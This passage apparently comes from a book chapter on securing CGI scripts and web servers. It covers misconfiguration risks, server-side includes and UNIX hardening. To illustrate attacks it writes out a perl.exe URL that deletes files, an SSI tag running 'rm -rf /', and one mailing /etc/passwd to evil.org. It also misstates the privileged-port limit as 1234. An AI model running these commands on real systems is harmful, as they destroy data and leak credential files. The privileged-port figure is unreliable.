Unless you've programmed network software in the past, security has probably been the least of your programming concerns. After all, you don't need to worry about writing insecure programs on a single-user machine because, presumably, only one person has access to the machine anyway.
However, programming software designed for use over the Internet requires a different paradigm of programming with a much greater emphasis on security. There's an old computer maxim that says the only way to truly secure a computer is to disconnect it from the rest of the world and keep it in a locked room. Simply connecting the machine to a network weakens your machine's security.
This especially holds true for a large scale "network of networks" like the Internet, where literally millions of people potentially have access to your computer. Many of the services over the Internetespecially the World Wide Webwere designed so that other people could easily access information from your computer. Each of these services you make available (either consciously or inadvertently) is another possible door for a wily, malicious user to exploit. A badly written network server can be easily intruded, potentially giving someone access to your entire machine and your important data.
What do I mean when I say that every network service you provide is like another door on your system? What exactly constitutes a security breach? For all intents and purposes, a security breach is when a person gains unauthorized access to your machine. "Unauthorized access" can mean many things ranging from running a program on the server not meant to be publicly run to obtaining root access on a UNIX machine.
You are largely dependent on the knowledge and carefulness of the programmers who wrote the network servers for security. After all, one cannot expect you to have to carefully sift through thousands of lines of source code simply to make sure there are no security holes in the software; for the most part, you depend on the reliability of the programmer and other experts who have sifted through source and carefully tested the software. While past incidents such as the Internet Worm have demonstrated that you cannot completely trust programmers to write perfectly secure code, you can take steps to minimize the risk.
Later, in "Securing Your Web Server," you learn Web server security. For the moment, assume your Web server software is secure and properly configured; that is, no one can gain unauthorized access to your machine through your Web server alone. Why is it important to write secure CGI scripts? CGI is a generic protocol that enables you to extend the Web server. By writing a CGI program, you are adding functionality to the Web server, functionality that might inadvertently introduce new security holes. A carelessly written CGI application can allow anyone full access to your machine.
When users submit a form or access a CGI script in another manner, you are essentially allowing them to run an application remotely on your machine. Because many CGI applications accept some form of user input (either through a fill-out form or from the command line), to some extent you are allowing users to control how the CGI application is run. As a CGI author, you need to make sure that your CGI script can be used only for its specified purpose. This chapter goes over related Web-security issues and provides in-depth information on writing secure CGI programs. At the end of this chapter, you also learn how to author CGI for secure transactions.
Overall security of your Web serving machine depends on many factors. A secure CGI program is useless if your server is misconfigured or if there are other holes on your system. I discuss some of the related Web security issues here and explain how to properly configure your Web server for CGI.
A common question is which platform is more secure for a Web server: a Macintosh running System 7, a UNIX workstation, a PC running OS/2, and so on. There have been many wars on this topic, each of which reflects people's different biases toward different operating systems.
No operating system is clearly more secure than another. UNIX is arguably more secure than a single-user platform such as a Macintosh or a PC running Windows, because once a user breaks into one of these latter machines, he or she has access to all your files. UNIX, however, has a fundamental understanding of file ownerships and permissions. If your server is configured correctly and is owned by a safe (for example, non-root) user, then if someone unauthorized breaks in, he or she can do only limited damage. Limited damage, however, can be bad enough, as you will see in the examples later in this chapter.
On the other hand, because UNIX often comes preconfigured with many different types of network services such as mail, FTP, Gopher, WWW, and so on, there are more potential "doors" for someone to enter. Securing all of these services is a difficult and time-consuming process, even for the experienced administrator. Even if you configure everything correctly, you are still at the mercy of possible bugs in each individual package. Security flaws in various packages are not uncommon, as is clear from the frequency of notices of insecurities in various common UNIX network services from organizations such as the Computer Emergency Response Team (CERT).
Every different platform has its own different security implications, but one is not more secure than another. Although you should be aware of the implications of each operating system, it should not be your primary criteria when choosing a platform. Choose your platform, seal off the holes associated with that platform, and then configure your Web server securely and correctly. Only after you have completed these steps should you concern yourself with writing secure CGI scripts.
The first step for writing secure CGI scripts is to make sure your Web server is securely and properly configured. If your Web server is not secure, it does not matter how carefully you write your CGI scripts; people can still break into your machine. Additionally, configuring your Web server correctly helps minimize the potential damage of a badly written CGI program.
You should have three goals when securing your Web server:
The more I know about your computer, the better equipped I am to break into it. For example, if I knew which directory or folder all of your sensitive, private information was stored, I have narrowed my objective from gaining total access to your machine to simply gaining access to a directory, usually a simpler task. Or if I had access to your server configuration files or source code to your CGI scripts, I could easily browse through them looking for potential security holes. If there are holes in your system, you don't want to make it easy for others to know about them, and you want to find them before others do.
As discussed earlier in Chapter 2, "The Basics," most Web servers enable you to run CGI programs in many different ways. For example, you could designate a specific directory as your cgi-bin. Alternatively, you could allow CGI to be stored in any directory.
There are advantages and disadvantages to both, but from a security standpoint, it is better to designate one directory to store all of your CGI applications. Having all of your programs in one directory makes it easier to keep track of all of the applications on your server and to audit them for potential security holes. It also helps prevent tampering. If your scripts are located in several different directories, you need to constantly check each one of these for tampering.
If you tend to use a scripting language (such as Perl) for most of your applications, then the source code is contained within the application itself. This code, then, is potentially vulnerable to being read, and exploited, if you're not careful. For example, many text editors save backup files, usually appending some extension to the end of the filename (such as .bak).
For example, emacs saves backup files with the extension filename~. Suppose that you have a CGI script written in Perlprogram.cgistored in one of the Web data directories rather than in a central designated directory. Now suppose that you made a trivial change to the program using emacs and forgot to remove the backup file. You now have two files in your directory: program.cgi and program.cgi~. The Web server knows that files ending in .cgi are CGI programs and will run the program rather than display its content. However, a smart user might try to access program.cgi~ instead. Because it does not end in .cgi, your Web server sends it as a raw text file, thus allowing the user to search your source code for possible holes. This violates the first maxim of revealing more information than necessary.
However, if your server enables you to specify all files located in a certain directory as a CGI, it doesn't matter what the extension of the file is. So in the same example earlier, if the backup file were located in a properly designated directory and a user tried to access it, the server would try to run the program rather than send the source code.
Note that designating a central directory as the location of all CGI programs on your server is limiting, especially on a multiuser system. For example, if you are an Internet Service Provider and you want to allow your users to write and run their own CGI, you might be inclined to allow CGI to be stored in any directory. Before you do this, consider the alternative options carefully. Are your clients going to be writing a lot of special customized scripts? If not, it is better to have your clients submit the scripts for auditing before being added to the cgi-bin directory rather than enabling CGI in all directories.
Another issue regarding the location of CGI programs is where to put the interpreter. For interpreted scripts, the server runs the interpreter, which in turn loads the script and executes it.
Never put the interpreter in your cgi-bin directory, or in any directory in your data tree for that matter. Giving users access to the interpreter essentially gives them the power to run any application or any series of commands on your system.
This is especially important if you use a Windows or other non-UNIX operating system. In UNIX, you can specify the interpreter in the first line of your script. For example:
#!/usr/local/bin/perl # this first line says use Perl to run the following script
In Windows, for example, there is no analogous method of specifying the interpreter within the script. One way to call a Perl script would be to create a batch file that calls Perl and the script:
rem progname.bat rem a wrapper for my perl script, progname.pl c:\perl\perl.exe progname.pl
However, you might be inclined to avoid creating this extra program by simply putting perl.exe in your cgi-bin directory and accessing the following URL:
http://hostname/cgi-bin/perl.exe?progname.pl
This works, but it also enables anyone in the world to run any Perl command on your machine. For example, someone could access the following URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is equivalent to calling Perl and running the following one-line program, which will delete all the files in the current directory. Clearly, this is undesirable behavior.
unlink <*.*>;
You will never have a reason to put an interpreter in your cgi-bin directory (or any directory capable of running CGI), so never do it. Some Windows servers can determine the type of script by its extension and run the appropriate interpreter. For example, Win-HTTPD assumes every CGI script ending in .pl is a Perl script and will run Perl automatically. If your Web server does not have this feature, use a wrapper script like the first Windows Perl example earlier in this chapter.
In Chapter 4, "Output," you learned a few reasons why you should avoid server-side includes. A common reason often raised is security. Specifically, some implementations of server-side includes (notably NCSA and Netscape) enable users to embed the output of programs in an HTML document. Every time one of these HTML files is accessed, the program is run on the server-side and the output is displayed as part of the HTML document.
By allowing this sort of server-side include, you become susceptible to a few potential security risks. First, on a UNIX machine, the programs are run by the owner of the server, not the owner of the program. If your server isn't properly configured and you have sensitive files or programs owned by the server owner, these files and programs and their output become accessible by users on your machine.
This risk increases if you allow users to edit HTML files on your system from Web browsers. A common example of this is a guestbook. In a guestbook, users fill out a form and submit messages to a CGI program, which will often simply append the unedited message to an HTML file, the guestbook. By not editing or filtering the submitted message, you allow the user to submit HTML code from his or her browser. If you allow programs to be executed in a server-side include, a malicious user can wreak havoc to your machine by submitting a tag like the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include will attempt to delete everything it can on your machine.
Note that you could have prevented this problem in several ways without having to completely turn off server-side includes. You could have filtered out all HTML tags before appending the submitted text to your guestbook. Or you could have disabled the exec capability of your server-side include (I'll show you how to do this for the NCSA server later in this chapter in "Securing Your Web Server").
If you forgot to do either of these things, other precautions you should have taken would have greatly minimized the damage on your machine by such a tag anyway. For example, as long as your server was running as a nonexistent, non-root user, this tag would most likely not have deleted anything of any importance, perhaps nothing at all. Suppose that instead of attempting to delete everything on your disks, the malicious user attempted to obtain your /etc/passwd for hopeful cracking purposes using something like the following:
<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->
However, if your system was using the shadow password suite, then your /etc/passwd has no useful information to potential hackers.
This example demonstrates two important things about both server-side includes and CGI in general. First, security holes can be completely hidden. Who would have thought that a simple guestbook program on a system with server-side includes posed a large security risk? Second, the potential damage of an inadvertent security hole can be greatly minimized by carefully configuring your server and securing your machine as a whole.
Although server-side includes add another potentially useful dimension to your Web server, think carefully about the potential risks, as well. In Chapter 4 I offered several alternatives to using server-side includes. Unless you absolutely need to use server-side includes, you might as well disable them and close off a potential security hole.
A secured UNIX system is a powerful platform for serving Web documents. However, there are many complex issues associated with securing and properly configuring a UNIX Web server. The very first thing you should do is make sure your machine is as secure as possible.
Disable network services you don't need, no matter how harmless you think they are. It is highly unlikely that anyone can break into your machine using the finger protocol, for example, which only answers queries about users. However, finger can give hackers useful information about your system.
Secure your system internally. If a hacker manages to break into one user's account, make sure the hacker cannot gain any additional privileges. Useful actions include installing a shadow password suite and removing all setuid scripts (scripts that are set to run as the owner of the script, even if called by another user).
Securing a UNIX machine is a complex topic and goes beyond the scope of this book. I highly recommend you purchase a book on the topic, read the resources available on the Internet, even hire a consultant if necessary. Don't underestimate the importance of securing your machine.
Next, allot separate space for your Web server and document files. The intent of your document directories is to serve these files to other people, possibly to the rest of the world, so don't put anything in these directories that you wouldn't want anyone else to see. Your server directories contain important log and configuration information. You definitely do not want outside users to see this information, and you most likely don't want most of your internal users to see it or write to it either.
Set the ownership and permissions of your directories and server wisely. It's common practice to create a new user and group specifically to own Web-related directories. Make sure nonprivileged users cannot write to the server or document directories.
Your server should never be "running as root." This is a misleading statement. In UNIX, only root can access ports less than 1234. Because by default Web servers run on port 80, you need to be root to start a Web server. However, after the Web server is started as root, it can either change its own process's ownership (if it's internally threaded) or change the ownership of its child processes that handle connections (if it's a forking server). Either method allows the server to process requests as a non-root user. Make sure you configure your Web server to "run as non-root," preferably as a completely nonexistent user such as "nobody." This limits the potential damage if you have a security hole in either your server or your CGI program.
Disable all features unless you absolutely need them. If you initially disable a feature and then later decide you want to use it, you can always turn it back on. Features you might want to disable include server-side includes and serving symbolic links.
If your users don't need to serve their personal Web documents from your server, disable public Web directories. This enables you to have complete and central control over all documents served from your machine, an important quality for general maintenance and security.
If your users do need to serve their personal documents (for example, if you are an Internet Access Provider), make sure they cannot override your main configuration. Seriously consider whether users need the ability to run CGI programs from their own personal directories. As stated earlier, it's preferable to store all CGI in one centralized location.
Finally, you might want to consider setting up a chroot environment for your Web documents. In UNIX, you ca